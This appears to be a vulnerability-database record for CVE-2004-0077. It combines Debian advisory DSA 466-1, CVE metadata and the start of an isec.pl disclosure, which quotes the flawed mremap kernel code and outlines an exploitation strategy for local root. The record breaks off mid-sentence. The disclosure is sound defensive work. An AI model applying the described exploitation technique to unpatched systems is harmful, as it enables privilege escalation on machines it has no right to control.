[SECURITY] [DSA 466-1] New Linux 2.2.10 packages fix local root exploit (powerpc/apus)
2004-03-18T00:00:00
ID DEBIAN:DSA-466-1:EA90F Type debian Reporter Debian Modified 2004-03-18T00:00:00
Description
Debian Security Advisory DSA 466-1 security@debian.org
http://www.debian.org/security/ Martin Schulze
March 18th, 2004 http://www.debian.org/security/faq
Package : kernel-source-2.2.10, kernel-image-2.2.10-powerpc-apus
Vulnerability : failing function and TLB flush
Problem-Type : local
Debian-specific: no
CVE ID : CAN-2004-0077
CERT advisory : VU#981222
Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical
security vulnerability in the memory management code of Linux inside
the mremap(2) system call. Due to flushing the TLB (Translation
Lookaside Buffer, an address cache) too early it is possible for an
attacker to trigger a local root exploit.
The attack vectors for 2.4.x and 2.2.x kernels are exclusive for the
respective kernel series, though. We formerly believed that the
exploitable vulnerability in 2.4.x does not exist in 2.2.x which is
still true. However, it turned out that a second (sort of)
vulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a
different exploit, of course.
For the stable distribution (woody) this problem has been fixed in
version 2.2.10-13woody1 of 2.2 kernel images for the powerpc/apus
architecture and in version 2.2.10-2 of Linux 2.2.10 source.
For the unstable distribution (sid) this problem will be fixed soon
with the 2.4.20 kernel-image package for powerpc/apus. The old 2.2.10
kernel image will be removed from Debian unstable.
You are strongly advised to switch to the fixed 2.4.17 kernel-image
package for powerpc/apus from woody until the 2.4.20 kernel-image
package is fixed in the unstable distribution.
We recommend that you upgrade your Linux kernel package.
Upgrade Instructions
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
These files will probably be moved into the stable distribution on
its next revision.
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
{"id": "DEBIAN:DSA-466-1:EA90F", "bulletinFamily": "unix", "title": "[SECURITY] [DSA 466-1] New Linux 2.2.10 packages fix local root exploit (powerpc/apus)", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 466-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMarch 18th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.2.10, kernel-image-2.2.10-powerpc-apus\nVulnerability : failing function and TLB flush\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2004-0077\nCERT advisory : VU#981222\n\nPaul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.2.10-13woody1 of 2.2 kernel images for the powerpc/apus\narchitecture and in version 2.2.10-2 of Linux 2.2.10 source.\n\nFor the unstable distribution (sid) this problem will be fixed soon\nwith the 2.4.20 kernel-image package for powerpc/apus. The old 2.2.10\nkernel image will be removed from Debian unstable.\n\nYou are strongly advised to switch to the fixed 2.4.17 kernel-image\npackage for powerpc/apus from woody until the 2.4.20 kernel-image\npackage is fixed in the unstable distribution.\n\nWe recommend that you upgrade your Linux kernel package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.10/kernel-source-2.2.10_2.2.10-2.dsc\n Size/MD5 checksum: 602 c30270ed0bb5a9b99775aefaff4b5037\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.10/kernel-source-2.2.10_2.2.10-2.diff.gz\n Size/MD5 checksum: 13862 b0dec7f7611601b2aab69d2117298641\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.10/kernel-source-2.2.10_2.2.10.orig.tar.gz\n Size/MD5 checksum: 13902979 e3e865f9103dfcea4a3715d66d89dad1\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.10-powerpc-apus/kernel-image-2.2.10-powerpc-apus_2.2.10-13woody1.dsc\n Size/MD5 checksum: 614 f6f2c6563e5eed7ff97d19551a1117fb\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.10-powerpc-apus/kernel-image-2.2.10-powerpc-apus_2.2.10-13woody1.tar.gz\n Size/MD5 checksum: 453378 865a8125d959621697b045edc210e200\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.10/kernel-doc-2.2.10_2.2.10-2_all.deb\n Size/MD5 checksum: 866978 74d85ee7a1f5855710b3201b907967dd\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.10/kernel-source-2.2.10_2.2.10-2_all.deb\n Size/MD5 checksum: 11302672 7a66220ced59920d2cc50eff7003108f\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.10-powerpc-apus/kernel-headers-2.2.10-apus_2.2.10-13woody1_powerpc.deb\n Size/MD5 checksum: 1575772 03558d9d86b2c08194088cf5cece6811\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.10-powerpc-apus/kernel-image-2.2.10-apus_2.2.10-13woody1_powerpc.deb\n Size/MD5 checksum: 1303764 2a3c5a6a45c3978ae45c4572ddc0547b\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "published": "2004-03-18T00:00:00", "modified": "2004-03-18T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00063.html", "reporter": "Debian", "references": [], "cvelist": ["CVE-2004-0077"], "type": "debian", "lastseen": "2019-05-30T02:22:36", "edition": 2, "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0077"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:32797"]}, {"type": "redhat", "idList": ["RHSA-2004:106", "RHSA-2004:066", "RHSA-2004:069"]}, {"type": "openvas", "idList": ["OPENVAS:53152", "OPENVAS:53141", "OPENVAS:53681", "OPENVAS:53143", "OPENVAS:53163", "OPENVAS:53138", "OPENVAS:54527", "OPENVAS:53205", "OPENVAS:136141256231053944", "OPENVAS:53154"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-438.NASL", "DEBIAN_DSA-454.NASL", "DEBIAN_DSA-466.NASL", "DEBIAN_DSA-456.NASL", "REDHAT-RHSA-2004-066.NASL", "DEBIAN_DSA-444.NASL", "DEBIAN_DSA-441.NASL", "DEBIAN_DSA-453.NASL", "DEBIAN_DSA-514.NASL", "GENTOO_GLSA-200403-02.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DSA-456-1:504C8", "DEBIAN:DSA-438-1:101CF", "DEBIAN:DSA-444-1:58039", "DEBIAN:DSA-450-1:2B3D9", "DEBIAN:DSA-441-1:C8D41", "DEBIAN:DSA-440-1:02E59", "DEBIAN:DSA-514-1:B034B", "DEBIAN:DSA-454-1:8FBF7", "DEBIAN:DSA-439-1:136C6", "DEBIAN:DSA-453-1:4CA6B"]}, {"type": "exploitdb", "idList": ["EDB-ID:160", "EDB-ID:154"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:5853", "SECURITYVULNS:DOC:5788"]}, {"type": "gentoo", "idList": ["GLSA-200403-02"]}, {"type": "osvdb", "idList": ["OSVDB:3986"]}, {"type": "slackware", "idList": ["SSA-2004-049-01"]}, {"type": "cert", "idList": ["VU:981222"]}, {"type": "suse", "idList": ["SUSE-SA:2004:005"]}], "modified": "2019-05-30T02:22:36", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2019-05-30T02:22:36", "rev": 2}, "vulnersScore": 7.5}, "affectedPackage": [{"OS": "Debian", "OSVersion": "3", "arch": "all", "operator": "lt", "packageFilename": "kernel-source-2.2.10, kernel-image-2.2.10-powerpc-apus_2.2.10-13woody1_all.deb", "packageName": "kernel-source-2.2.10, kernel-image-2.2.10-powerpc-apus", "packageVersion": "2.2.10-13woody1"}], "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:22:57", "description": "The do_mremap function for the mremap system call in Linux 2.2 to 2.2.25, 2.4 to 2.4.24, and 2.6 to 2.6.2, does not properly check the return value from the do_munmap function when the maximum number of VMA descriptors is exceeded, which allows local users to gain root privileges, a different vulnerability than CAN-2003-0985.", "edition": 4, "cvss3": {}, "published": "2004-03-03T05:00:00", "title": "CVE-2004-0077", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0077"], "modified": "2018-05-03T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:2.2.20", "cpe:/o:linux:linux_kernel:2.2.7", "cpe:/o:trustix:secure_linux:2.0", "cpe:/o:linux:linux_kernel:2.2.24", "cpe:/o:linux:linux_kernel:2.4.9", "cpe:/o:linux:linux_kernel:2.4.21", "cpe:/o:linux:linux_kernel:2.2.15", "cpe:/o:linux:linux_kernel:2.2.5", "cpe:/o:linux:linux_kernel:2.4.11", "cpe:/o:linux:linux_kernel:2.4.5", "cpe:/o:linux:linux_kernel:2.6.1", "cpe:/o:linux:linux_kernel:2.4.20", "cpe:/o:linux:linux_kernel:2.4.14", "cpe:/a:redhat:kernel_source:2.4.20-8", "cpe:/o:linux:linux_kernel:2.2.21", "cpe:/o:linux:linux_kernel:2.2.1", "cpe:/o:linux:linux_kernel:2.2.18", "cpe:/o:linux:linux_kernel:2.4.8", "cpe:/o:linux:linux_kernel:2.2.14", "cpe:/o:linux:linux_kernel:2.4.7", "cpe:/o:linux:linux_kernel:2.2.17", "cpe:/o:linux:linux_kernel:2.4.2", "cpe:/o:linux:linux_kernel:2.4.22", "cpe:/o:linux:linux_kernel:2.2.15_pre20", "cpe:/o:linux:linux_kernel:2.4.18", "cpe:/o:linux:linux_kernel:2.2.23", "cpe:/o:linux:linux_kernel:2.2.4", "cpe:/o:linux:linux_kernel:2.4.16", "cpe:/o:linux:linux_kernel:2.4.4", "cpe:/o:linux:linux_kernel:2.2.3", "cpe:/o:linux:linux_kernel:2.2.16", "cpe:/o:linux:linux_kernel:2.6.0", "cpe:/o:linux:linux_kernel:2.6.2", "cpe:/o:linux:linux_kernel:2.4.23", "cpe:/o:linux:linux_kernel:2.2.10", "cpe:/a:redhat:bigmem_kernel:2.4.20-8", "cpe:/o:linux:linux_kernel:2.4.12", "cpe:/o:linux:linux_kernel:2.2.6", "cpe:/o:linux:linux_kernel:2.4.13", "cpe:/o:linux:linux_kernel:2.2.9", "cpe:/o:linux:linux_kernel:2.4.0", "cpe:/o:trustix:secure_linux:1.5", "cpe:/o:linux:linux_kernel:2.2.2", "cpe:/o:linux:linux_kernel:2.2.11", "cpe:/o:linux:linux_kernel:2.4.6", "cpe:/o:linux:linux_kernel:2.4.10", "cpe:/o:linux:linux_kernel:2.2.0", "cpe:/o:linux:linux_kernel:2.4.19", "cpe:/o:linux:linux_kernel:2.2.19", "cpe:/o:linux:linux_kernel:2.6_test9_cvs", "cpe:/o:linux:linux_kernel:2.2.13", "cpe:/o:linux:linux_kernel:2.2.12", "cpe:/o:linux:linux_kernel:2.4.3", "cpe:/a:redhat:kernel:2.4.20-8", "cpe:/o:linux:linux_kernel:2.4.17", "cpe:/o:linux:linux_kernel:2.4.1", "cpe:/o:linux:linux_kernel:2.4.15", "cpe:/o:netwosix:netwosix_linux:1.0", "cpe:/o:linux:linux_kernel:2.2.8", "cpe:/a:redhat:kernel_doc:2.4.20-8", "cpe:/o:linux:linux_kernel:2.2.22", "cpe:/o:linux:linux_kernel:2.4.24"], "id": "CVE-2004-0077", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0077", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.2.15_pre20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test9:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test12:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test2:*:*:*:*:*:*", "cpe:2.3:a:redhat:kernel_doc:2.4.20-8:*:i386:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.15:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:kernel:2.4.20-8:*:i686_smp:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test11:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test11:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.24:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:kernel:2.4.20-8:*:i386:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test9:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test10:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:kernel:2.4.20-8:*:athlon:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:bigmem_kernel:2.4.20-8:*:i686:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6_test9_cvs:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.15:pre16:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre2:*:*:*:*:*:*", "cpe:2.3:a:redhat:kernel_source:2.4.20-8:*:i386_src:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.23:pre9:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre6:*:*:*:*:*:*", "cpe:2.3:a:redhat:kernel:2.4.20-8:*:athlon_smp:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:netwosix:netwosix_linux:1.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.11:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:kernel:2.4.20-8:*:i686:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:pre7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:x86:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.16:pre6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test10:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre3:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:24:29", "description": "", "published": "2004-03-02T00:00:00", "type": "packetstorm", "title": "isec-0014-mremap-unmap.v2.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0077"], "modified": "2004-03-02T00:00:00", "id": "PACKETSTORM:32797", "href": "https://packetstormsecurity.com/files/32797/isec-0014-mremap-unmap.v2.txt.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nSynopsis: Linux kernel do_mremap VMA limit local privilege escalation \nvulnerability \nProduct: Linux kernel \nVersion: 2.2 up to and including 2.2.25, 2.4 up to to and including 2.4.24, \n2.6 up to to and including 2.6.2 \nVendor: http://www.kernel.org/ \nURL: http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt \nCVE: CAN-2004-0077 \nAuthor: Paul Starzetz <ihaquer@isec.pl> \nDate: March 1, 2004 \n \n \nIssue: \n====== \n \nA critical security vulnerability has been found in the Linux kernel memory \nmanagement code inside the mremap(2) system call due to missing function return \nvalue check. This bug is completely unrelated to the mremap bug disclosed on \n05-01-2004 except concerning the same internal kernel function code. \n \n \nDetails: \n======== \n \nThe Linux kernel manages a list of user addressable valid memory locations on a \nper process basis. Every process owns a single linked list of so called virtual \nmemory area descriptors (called from now on just VMAs). Every VMA describes the \nstart of a valid memory region, its length and moreover various memory flags \nlike page protection. \n \nEvery VMA in the list corresponds to a part of the process's page table. The \npage table contains descriptors (in short page table entries PTEs) of physical \nmemory pages seen by the process. The VMA descriptor can be thus understood as a \nhigh level description of a particular region of the process's page table \nstoring PTE properties like page R/W flag and so on. \n \nThe mremap() system call provides resizing (shrinking or growing) as well as \nmoving of existing virtual memory areas or any of its parts across process's \naddressable space. \n \nMoving a part of the virtual memory from inside a VMA area to a new location \nrequires creation of a new VMA descriptor as well as copying the underlying page \ntable entries described by the VMA from the old to the new location in the \nprocess's page table. \n \nTo accomplish this task the do_mremap code calls the do_munmap() internal kernel \nfunction to remove any potentially existing old memory mapping in the new \nlocation as well as to remove the old virtual memory mapping. Unfortunately the \ncode doesn't test the return value of the do_munmap() function which may fail if \nthe maximum number of available VMA descriptors has been exceeded. This happens \nif one tries to unmap middle part of an existing memory mapping and the \nprocess's limit on the number of VMAs has been reached (which is currently \n65535). \n \nOne of the possible situations can be illustrated with the following picture. \nThe corresponding page table entries (PTEs) have been marked with o and x: \n \nBefore mremap(): \n \n(oooooooooooooooooooooooo) (xxxxxxxxxxxx) \n[----------VMA1----------] [----VMA2----] \n[REMAPPED-VMA] <---------------| \n \n \nAfter mremap() without VMA limit: \n \n(oooo)(xxxxxxxxxxxx)(oooo) \n[VMA3][REMAPPED-VMA][VMA4] \n \n \nAfter mremap() but VMA limit: \n \n(ooooxxxxxxxxxxxxxxoooo) \n[---------VMA1---------] \n[REMAPPED-VMA] \n \n \nAfter the maximum number of VMAs in the process's VMA list has been reached \ndo_munmap() will refuse to create the necessary VMA hole because it would split \nthe original VMA in two disjoint VMA areas exceeding the VMA descriptor limit. \n \nDue to the missing return value check after trying to unmap the middle of the \nVMA1 (this is the first invocation of do_munmap inside do_mremap code) the \ncorresponding page table entries from VMA2 are still inserted into the page \ntable location described by VMA1 thus being subject to VMA1 page protection \nflags. It must be also mentioned that the original PTEs in the VMA1 are lost \nthus leaving the corresponding page frames unusable for ever. \n \nThe kernel also tries to insert the overlapping VMA area into the VMA descriptor \nlist but this fails due to further checks in the low level VMA manipulation \ncode. The low level VMA list check in the 2.4 and 2.6 kernel versions just call \nBUG() therefore terminating the malicious process. \n \nThere are also two other unchecked calls to do_munmap() inside the do_mremap() \ncode and we believe that the second occurrence of unchecked do_munmap is also \nexploitable. The second occurrence takes place if the VMA to be remapped is \nbeeing truncated in place. Note that do_munmap can also fail on an exceptional \nlow memory condition while trying to allocate a VMA descriptor. \n \n \nExploitation: \n============= \n \nThe vulnerability turned out to be very easily exploitable. Our first guess was \nto move PTEs from one VMA mapping a read-only file (like /etc/passwd) to another \nwriteable VMA. This approach failed because after the BUG() macro has been \ninvoked the mmap semaphore of the memory descriptor is left in a closed (that is \ndown_write()) state thus preventing any further memory operations which acquire \nthe semaphore in other clone threads. \n \nSo our attention came over the page table cache code which was introduced early \nin the 2.4 series but not enabled by default. Kernels later than the 2.4.19 \nenable the page table cache. The basic idea of a page table cache is to keep \nfree page frames recently used for the page tables in a linked list to speed up \nthe allocation of new page tables. \n \nOn Linux every process owns a reference to a memory descriptor (mm_struct) which \ncontains a pointer to a page directory. The page directory is a single page \nframe (we describe the 4kb sized pages case without PAE) containing 1024 \npointers to the page tables. A single page table page on the i386 architecture \nholds 1024 PTEs describing up to 4MB of process's virtual memory. A single PTE \ncontains the physical address of the page mapped at the PTE's virtual address \nand the page access rights. \n \nThe page tables are allocated on demand if a page fault occurs. They are also \nfreed and the corresponding page frames released to the memory manager if a \nprocess unmaps parts of its virtual memory spanning at least one page table page \nthat is a region containing at least a 4MB sized and 4MB aligned memory area. \n \nThere are two paths if a new page table must be allocated: the slow and the fast \none. The fast path takes one page from the head of the page table cache while \nthe slow one just calls get_free_page(). This works well if the pages from the \npage table cache have been properly cleared before inserting them into the \ncache. Normally the page tables are cleared by zap_page_range() which is called \nfrom do_munmap. It is very important for the proper operation of the Linux \nmemory management that all locations of the process's page table actually \ncontaining a valid PTE are covered by the corresponding VMA descriptor. \n \nIn the case of the unchecked do_munmap inside the mremap code we have found a \ncondition leaving a part of the page table uncovered by a VMA. The offending \ncode is: \n \n[269] if (old_len >= new_len) { \ndo_munmap(current->mm, addr+new_len, old_len - new_len); \nif (!(flags & MREMAP_FIXED) || (new_addr == addr)) \ngoto out; \n} \n \nThis piece of code is responsible for truncating the VMA the user wants to remap \nin place. It can be easily seen that do_munmap will fail if [addr+new_len, \naddr+new_len + (old_len-new_len)] goes into the middle of a VMA and the maximum \nnumber of allowed VMA descriptors has been already used by the process. That \nmeans also that the page table will still contain valid PTEs from addr+new_len \non. Later in the mremap code a part of the corresponding VMA is moved and \ntruncated: \n \n[179] if (!move_page_tables(current->mm, new_addr, addr, old_len)) { \nunsigned long vm_locked = vma->vm_flags & VM_LOCKED; \n \nif (allocated_vma) { \n*new_vma = *vma; \nnew_vma->vm_start = new_addr; \nnew_vma->vm_end = new_addr+new_len; \nnew_vma->vm_pgoff += (addr-vma->vm_start) >> PAGE_SHIFT; \n \nbut more PTEs (namely old_len) than the length of the created VMA are moved from \nthe old location if a new location has been specified along with the \nMREMAP_MAYMOVE flag. This works well only if the previous do_munmap did not \nfail. This situation can be illustrated as follows: \n \nbefore mremap: \n \n<-- old_len --> \n(oooooooooooooooooooooooooooo) \n[------|-----VMA1-----|------] \n|---------------------------------> new_addr \n \n \nafter mremap, no VMA limit: \nnew_len \n(oooooo) (oooooo) (oooooo) \n[-VMA1-] [-VMA3-] [-VMA2-] \n \n \nafter mremap but VMA limit: \nnew_len [*] \n(oooooo oooooo) (oooooo)ooooooooo \n[-----------VMA1-------------] [-VMA2-] \n \n \nThose [*] 'ownerless' PTE entries in the page table can be further exploited \nsince the memory manager has lost track of them. If the process now 